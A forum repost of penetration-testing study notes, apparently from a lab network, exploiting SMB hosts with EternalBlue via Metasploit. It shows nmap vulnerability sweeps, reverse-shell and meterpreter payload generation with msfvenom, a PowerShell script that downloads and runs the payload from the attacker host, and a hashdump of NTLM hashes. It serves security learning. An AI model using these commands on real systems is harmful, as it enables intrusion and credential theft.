搜索
查看: 730|回复: 0

渗透测试学习笔记之案例一

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-8-10 16:37:26 | 显示全部楼层 |阅读模式
转自:http://avfisher.win/archives/741

0x00 前言
很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。
0x01 案列分析
实验环境:
  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux (10.11.0.79)
信息收集:
扫描存在smb服务的主机:
  1. # nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt
  2. # cat smb_service.txt | grep -i windows | cut -d" " -f2
  3. 10.11.1.5
  4. 10.11.1.31
  5. 10.11.1.49
  6. 10.11.1.50
  7. 10.11.1.73
  8. 10.11.1.128
  9. 10.11.1.145
  10. 10.11.1.202
  11. 10.11.1.218
  12. 10.11.1.220
  13. 10.11.1.223
  14. 10.11.1.227
  15. 10.11.1.229
  16. 10.11.1.230
  17. # cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt
复制代码
扫描存在smb漏洞的主机:
  1. # find / -name smb*vuln*.nse
  2. /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
  3. /usr/share/nmap/scripts/smb-vuln-ms06-025.nse
  4. /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
  5. /usr/share/nmap/scripts/smb-vuln-ms07-029.nse
  6. /usr/share/nmap/scripts/smb-vuln-ms17-010.nse
  7. /usr/share/nmap/scripts/smb-vuln-conficker.nse
  8. /usr/share/nmap/scripts/smb-vuln-ms08-067.nse
  9. /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
  10. /usr/share/nmap/scripts/smb-vuln-ms10-054.nse
  11. /usr/share/nmap/scripts/smb-vuln-ms10-061.nse
  12. # for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done
  13. # cat smb_vulns_smb-vuln-*.txt | grep IDs:
  14. |     IDs:  CVE:CVE-2009-3103
  15. |     IDs:  CVE:CVE-2009-3103
  16. |     IDs:  CVE:CVE-2009-3103
  17. |     IDs:  CVE:CVE-2009-3103
  18. |     IDs:  CVE:CVE-2017-0143
  19. |     IDs:  CVE:CVE-2017-0143
  20. |     IDs:  CVE:CVE-2017-0143
  21. |     IDs:  CVE:CVE-2017-0143
  22. |     IDs:  CVE:CVE-2017-0143
  23. |     IDs:  CVE:CVE-2017-0143
  24. |     IDs:  CVE:CVE-2017-0143
  25. |     IDs:  CVE:CVE-2017-0143
  26. |     IDs:  CVE:CVE-2017-0143
  27. |     IDs:  CVE:CVE-2017-0143
  28. |     IDs:  CVE:CVE-2017-0143
  29. |     IDs:  CVE:CVE-2017-0143
  30. |     IDs:  CVE:CVE-2017-0143
复制代码
漏洞利用:
检查并验证存在smb ms17-010漏洞的主机:
  1. # cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt
  2. # Nmap 7.50 scan initiated Mon Jul  3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt
  3. Nmap scan report for 10.11.1.5
  4. Host is up (0.24s latency).

  5. PORT    STATE SERVICE
  6. 139/tcp open  netbios-ssn
  7. 445/tcp open  microsoft-ds
  8. MAC Address: 00:50:56:89:35:AF (VMware)

  9. Host script results:
  10. | smb-vuln-ms17-010:
  11. |   VULNERABLE:
  12. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
  13. |     State: VULNERABLE
  14. |     IDs:  CVE:CVE-2017-0143
  15. |     Risk factor: HIGH
  16. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
  17. |        servers (ms17-010).
  18. |      
  19. |     Disclosure date: 2017-03-14
  20. |     References:
  21. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
  22. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
  23. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]

  24. ... ...

  25. Nmap scan report for 10.11.1.220
  26. Host is up (0.24s latency).

  27. PORT    STATE SERVICE
  28. 139/tcp open  netbios-ssn
  29. 445/tcp open  microsoft-ds
  30. MAC Address: 00:50:56:89:15:14 (VMware)

  31. Host script results:
  32. | smb-vuln-ms17-010:
  33. |   VULNERABLE:
  34. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
  35. |     State: VULNERABLE
  36. |     IDs:  CVE:CVE-2017-0143
  37. |     Risk factor: HIGH
  38. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
  39. |        servers (ms17-010).
  40. |      
  41. |     Disclosure date: 2017-03-14
  42. |     References:
  43. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
  44. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
  45. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]

  46. ... ...

  47. Nmap scan report for 10.11.1.230
  48. Host is up (0.25s latency).

  49. PORT    STATE SERVICE
  50. 139/tcp open  netbios-ssn
  51. 445/tcp open  microsoft-ds
  52. MAC Address: 00:50:56:89:5C:19 (VMware)

  53. Host script results:
  54. | smb-vuln-ms17-010:
  55. |   VULNERABLE:
  56. |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
  57. |     State: VULNERABLE
  58. |     IDs:  CVE:CVE-2017-0143
  59. |     Risk factor: HIGH
  60. |       A critical remote code execution vulnerability exists in Microsoft SMBv1
  61. |        servers (ms17-010).
  62. |      
  63. |     Disclosure date: 2017-03-14
  64. |     References:
  65. |       [url]https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/[/url]
  66. |       [url]https://technet.microsoft.com/en-us/library/security/ms17-010.aspx[/url]
  67. |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143[/url]

  68. Read data files from: /usr/bin/../share/nmap
  69. # Nmap done at Mon Jul  3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds
复制代码
IP: 10.11.1.5 利用失败
  1. msf > use exploit/windows/smb/ms17_010_eternalblue  
  2. msf exploit(ms17_010_eternalblue) > show options   

  3. Module options (exploit/windows/smb/ms17_010_eternalblue):                                             

  4.    Name                Current Setting  Required  Description                                          
  5.    ----                ---------------  --------  -----------                                          
  6.    GroomAllocations    12               yes       Initial number of times to groom the kernel pool.     
  7.    GroomDelta          5                yes       The amount to increase the groom count by per try.   
  8.    MaxExploitAttempts  3                yes       The number of times to retry the exploit.            
  9.    ProcessName         spoolsv.exe      yes       Process to inject payload into.                       
  10.    RHOST                                yes       The target address                                    
  11.    RPORT               445              yes       The target port (TCP)                                 
  12.    SMBDomain           .                no        (Optional) The Windows domain to use for authentication
  13.    SMBPass                              no        (Optional) The password for the specified username   
  14.    SMBUser                              no        (Optional) The username to authenticate as            
  15.    VerifyArch          true             yes       Check if remote architecture matches exploit Target.  
  16.    VerifyTarget        true             yes       Check if remote OS matches exploit Target.            


  17. Exploit target:           

  18.    Id  Name               
  19.    --  ----               
  20.    0   Windows 7 and Server 2008 R2 (x64) All Service Packs   
  21. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5
  22. RHOST => 10.11.1.5
  23. msf exploit(ms17_010_eternalblue) > exploit

  24. [*] Started reverse TCP handler on 10.11.0.79:4444
  25. [*] 10.11.1.5:445 - Connecting to target for exploitation.
  26. [+] 10.11.1.5:445 - Connection established for exploitation.
  27. [!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
  28. [!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually...
  29. [-] 10.11.1.5:445 - Unable to continue with improper OS Target.
  30. [*] Exploit completed, but no session was created.
复制代码
IP: 10.11.1.230 同样地,利用失败了
  1. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230
  2. RHOST => 10.11.1.230
  3. msf exploit(ms17_010_eternalblue) > exploit

  4. [*] Started reverse TCP handler on 10.11.0.79:4444
  5. [*] 10.11.1.230:445 - Connecting to target for exploitation.
  6. [+] 10.11.1.230:445 - Connection established for exploitation.
  7. [+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply
  8. [*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes)
  9. [*] 10.11.1.230:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
  10. [*] 10.11.1.230:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600      
  11. [!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
  12. [!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually...
  13. [-] 10.11.1.230:445 - Unable to continue with improper OS Arch.
  14. [*] Exploit completed, but no session was created.
复制代码
IP: 10.11.1.220 成功利用并反弹了一个shell回来
  1. msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220
  2. RHOST => 10.11.1.220
  3. msf exploit(ms17_010_eternalblue) > exploit

  4. [*] Started reverse TCP handler on 10.11.0.79:4444
  5. [*] 10.11.1.220:445 - Connecting to target for exploitation.
  6. [+] 10.11.1.220:445 - Connection established for exploitation.
  7. [+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
  8. [*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
  9. [*] 10.11.1.220:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
  10. [*] 10.11.1.220:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
  11. [*] 10.11.1.220:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
  12. [*] 10.11.1.220:445 - 0x00000030  6b 20 31                                         k 1            
  13. [+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
  14. [*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
  15. [*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
  16. [*] 10.11.1.220:445 - Starting non-paged pool grooming
  17. [+] 10.11.1.220:445 - Sending SMBv2 buffers
  18. [+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  19. [*] 10.11.1.220:445 - Sending final SMBv2 buffers.
  20. [*] 10.11.1.220:445 - Sending last fragment of exploit packet!
  21. [*] 10.11.1.220:445 - Receiving response from exploit packet
  22. [+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
  23. [*] 10.11.1.220:445 - Sending egg to corrupted connection.
  24. [*] 10.11.1.220:445 - Triggering free of corrupted buffer.
  25. [*] Command shell session 1 opened (10.11.0.79:4444 -> 10.11.1.220:62009) at 2017-07-04 03:08:40 -0400
  26. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  27. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  28. [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  29. Microsoft Windows [Version 6.1.7601]
  30. Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

  31. C:Windowssystem32>whoami
  32. whoami
  33. nt authoritysystem
复制代码
后渗透利用:
在上一步中我们成功地从IP:10.11.1.220上反弹了一个shell回来,但很显然这不是一个完美的交互式的shell且不稳定可靠,那么接下来我们该怎么办呢?首先,我们想到的是获得一个功能更加强大且稳定可靠的meterpreter。
检查目标系统的操作系统版本:
  1. C:Windowssystem32>dir c:      
  2. dir c:
  3. Volume in drive C has no label.
  4. Volume Serial Number is A49A-E592

  5. Directory of c:

  6. 12/27/2013  11:37 PM              Ftp Root
  7. 07/13/2009  07:20 PM              PerfLogs
  8. 12/28/2013  02:15 AM              Program Files
  9. 12/28/2013  10:03 PM              Program Files (x86)
  10. 12/27/2013  11:37 PM              temp
  11. 08/02/2012  01:59 PM              Users
  12. 12/27/2013  11:37 PM              Windows
  13.                0 File(s)              0 bytes
  14.                7 Dir(s)  28,860,628,992 bytes free
复制代码
显然目标系统是一个64位的Windows server 2008的服务器
接下来,生成一个64位windows的meterpreter payload:
  1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x64 --platform win -o mp_64.exe
复制代码
注:32位的windows的meterpreter payload:
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o mp_86.exe
复制代码
上传meterpreter payload (mp_64.exe) 至攻击机的web目录中(/var/www/html/payload)以便目标机可以通过http链接来下载它。
重新开启一个msfconsole并开启监听。
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
  3. payload => windows/x64/meterpreter/reverse_tcp
  4. msf exploit(handler) > show options

  5. Module options (exploit/multi/handler):

  6.    Name  Current Setting  Required  Description
  7.    ----  ---------------  --------  -----------


  8. Payload options (windows/x64/meterpreter/reverse_tcp):

  9.    Name      Current Setting  Required  Description
  10.    ----      ---------------  --------  -----------
  11.    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
  12.    LHOST                      yes       The listen address
  13.    LPORT     4444             yes       The listen port


  14. Exploit target:

  15.    Id  Name
  16.    --  ----
  17.    0   Wildcard Target


  18. msf exploit(handler) > set LHOST 10.11.0.79
  19. LHOST => 10.11.0.79
  20. msf exploit(handler) > set LPORT 8080
  21. LPORT => 8080
  22. msf exploit(handler) > run

  23. [*] Started reverse TCP handler on 10.11.0.79:8080
  24. [*] Starting the payload handler...
复制代码
利用反弹的shell创建用于下载我们准备好的meterpreter payload的powershell脚本,然后执行脚本下载payload(mp_64.exe)并执行。
  1. c:UsersAdministratorDesktop>echo $storageDir=$pwd > wget.ps1
  2. echo $storageDir=$pwd > wget.ps1

  3. c:UsersAdministratorDesktop>echo $webclient=New-Object System.Net.WebClient >>wget.ps1
  4. echo $webclient=New-Object System.Net.WebClient >>wget.ps1

  5. c:UsersAdministratorDesktop>echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1     
  6. echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1

  7. c:UsersAdministratorDesktop>echo $file="mp_64.exe" >>wget.ps1
  8. echo $file="mp_64.exe" >>wget.ps1

  9. c:UsersAdministratorDesktop>echo $webclient.DownloadFile($url,$file) >>wget.ps1
  10. echo $webclient.DownloadFile($url,$file) >>wget.ps1

  11. c:UsersAdministratorDesktop>type wget.ps1
  12. type wget.ps1
  13. $storageDir=$pwd
  14. $webclient=New-Object System.Net.WebClient
  15. $url="http://10.11.0.79/payload/mp_64.exe"
  16. $file="mp_64.exe"
  17. $webclient.DownloadFile($url,$file)

  18. c:UsersAdministratorDesktop>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  19. powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1  

  20. c:UsersAdministratorDesktop>mp_64.exe
复制代码
至此,我们成功地获得了一个功能强大的meterpreter,并可以很容易去dump hash为更进一步的渗透做准备。
  1. msf exploit(handler) > exploit

  2. [*] Started reverse TCP handler on 10.11.0.79:8080
  3. [*] Starting the payload handler...
  4. [*] Sending stage (1189423 bytes) to 10.11.1.220
  5. [*] Meterpreter session 1 opened (10.11.0.79:8080 -> 10.11.1.220:49326) at 2017-08-09 03:57:36 -0400

  6. meterpreter > help
  7. Core Commands
  8. =============

  9.     Command                   Description
  10.     -------                   -----------
  11.     ?                         Help menu
  12.     background                Backgrounds the current session
  13.     bgkill                    Kills a background meterpreter script
  14.     bglist                    Lists running background scripts
  15.     bgrun                     Executes a meterpreter script as a background thread
  16.     channel                   Displays information or control active channels
  17.     close                     Closes a channel
  18.     disable_unicode_encoding  Disables encoding of unicode strings
  19.     enable_unicode_encoding   Enables encoding of unicode strings
  20.     exit                      Terminate the meterpreter session
  21.     get_timeouts              Get the current session timeout values
  22.     help                      Help menu
  23.     info                      Displays information about a Post module
  24.     irb                       Drop into irb scripting mode
  25.     load                      Load one or more meterpreter extensions
  26.     machine_id                Get the MSF ID of the machine attached to the session
  27.     migrate                   Migrate the server to another process
  28.     quit                      Terminate the meterpreter session
  29.     read                      Reads data from a channel
  30.     resource                  Run the commands stored in a file
  31.     run                       Executes a meterpreter script or Post module
  32.     sessions                  Quickly switch to another session
  33.     set_timeouts              Set the current session timeout values
  34.     sleep                     Force Meterpreter to go quiet, then re-establish session.
  35.     transport                 Change the current transport mechanism
  36.     use                       Deprecated alias for 'load'
  37.     uuid                      Get the UUID for the current session
  38.     write                     Writes data to a channel


  39. Stdapi: File system Commands
  40. ============================

  41.     Command       Description
  42.     -------       -----------
  43.     cat           Read the contents of a file to the screen
  44.     cd            Change directory
  45.     checksum      Retrieve the checksum of a file
  46.     cp            Copy source to destination
  47.     dir           List files (alias for ls)
  48.     download      Download a file or directory
  49.     edit          Edit a file
  50.     getlwd        Print local working directory
  51.     getwd         Print working directory
  52.     lcd           Change local working directory
  53.     lpwd          Print local working directory
  54.     ls            List files
  55.     mkdir         Make directory
  56.     mv            Move source to destination
  57.     pwd           Print working directory
  58.     rm            Delete the specified file
  59.     rmdir         Remove directory
  60.     search        Search for files
  61.     show_mount    List all mount points/logical drives
  62.     upload        Upload a file or directory


  63. Stdapi: Networking Commands
  64. ===========================

  65.     Command       Description
  66.     -------       -----------
  67.     arp           Display the host ARP cache
  68.     getproxy      Display the current proxy configuration
  69.     ifconfig      Display interfaces
  70.     ipconfig      Display interfaces
  71.     netstat       Display the network connections
  72.     portfwd       Forward a local port to a remote service
  73.     resolve       Resolve a set of host names on the target
  74.     route         View and modify the routing table


  75. Stdapi: System Commands
  76. =======================

  77.     Command       Description
  78.     -------       -----------
  79.     clearev       Clear the event log
  80.     drop_token    Relinquishes any active impersonation token.
  81.     execute       Execute a command
  82.     getenv        Get one or more environment variable values
  83.     getpid        Get the current process identifier
  84.     getprivs      Attempt to enable all privileges available to the current process
  85.     getsid        Get the SID of the user that the server is running as
  86.     getuid        Get the user that the server is running as
  87.     kill          Terminate a process
  88.     localtime     Displays the target system's local date and time
  89.     pgrep         Filter processes by name
  90.     pkill         Terminate processes by name
  91.     ps            List running processes
  92.     reboot        Reboots the remote computer
  93.     reg           Modify and interact with the remote registry
  94.     rev2self      Calls RevertToSelf() on the remote machine
  95.     shell         Drop into a system command shell
  96.     shutdown      Shuts down the remote computer
  97.     steal_token   Attempts to steal an impersonation token from the target process
  98.     suspend       Suspends or resumes a list of processes
  99.     sysinfo       Gets information about the remote system, such as OS


  100. Stdapi: User interface Commands
  101. ===============================

  102.     Command        Description
  103.     -------        -----------
  104.     enumdesktops   List all accessible desktops and window stations
  105.     getdesktop     Get the current meterpreter desktop
  106.     idletime       Returns the number of seconds the remote user has been idle
  107.     keyscan_dump   Dump the keystroke buffer
  108.     keyscan_start  Start capturing keystrokes
  109.     keyscan_stop   Stop capturing keystrokes
  110.     screenshot     Grab a screenshot of the interactive desktop
  111.     setdesktop     Change the meterpreters current desktop
  112.     uictl          Control some of the user interface components


  113. Stdapi: Webcam Commands
  114. =======================

  115.     Command        Description
  116.     -------        -----------
  117.     record_mic     Record audio from the default microphone for X seconds
  118.     webcam_chat    Start a video chat
  119.     webcam_list    List webcams
  120.     webcam_snap    Take a snapshot from the specified webcam
  121.     webcam_stream  Play a video stream from the specified webcam


  122. Priv: Elevate Commands
  123. ======================

  124.     Command       Description
  125.     -------       -----------
  126.     getsystem     Attempt to elevate your privilege to that of local system.


  127. Priv: Password database Commands
  128. ================================

  129.     Command       Description
  130.     -------       -----------
  131.     hashdump      Dumps the contents of the SAM database


  132. Priv: Timestomp Commands
  133. ========================

  134.     Command       Description
  135.     -------       -----------
  136.     timestomp     Manipulate file MACE attributes
  137. meterpreter > screenshot
  138. meterpreter > hashdump
  139. Administrator:500:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e:::
  140. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  141. krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bca55919186bf4443840164612ce9f77:::
  142. kevin:1106:aad3b435b51404eeaad3b435b51404ee:aef3d57f355a02297fc386630a01449e:::
  143. robert:1110:aad3b435b51404eeaad3b435b51404ee:0d3f32016ee8a42ba768d558875d57e5:::
  144. avfisher:1120:aad3b435b51404eeaad3b435b51404ee:ef28083240cb79a25adb4290ce6cb67b:::
  145. MASTER$:1000:aad3b435b51404eeaad3b435b51404ee:e0a6ad80117cbe539c459dafc5291f27:::
  146. SLAVE$:1103:aad3b435b51404eeaad3b435b51404ee:789cf984d53d9616fca933d37e974209:::
  147. OBSERVER$:1111:aad3b435b51404eeaad3b435b51404ee:d60552ce7c9dc4fabdf0ba4e5fc46f69:::
复制代码

0x03 小结
总结一下本案例中的渗透思路:
  • 利用nmap批量扫描开放smb服务端口的主机
  • 利用nmap扫描存在smb漏洞的服务主机
  • 利用ms17-010验证和攻击目标主机并反弹shell
  • 制作更加稳定可靠的meterpreter payload
  • 利用powershell脚本下载meterpreter并执行
  • 获得meterpreter为进一步渗透做准备

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表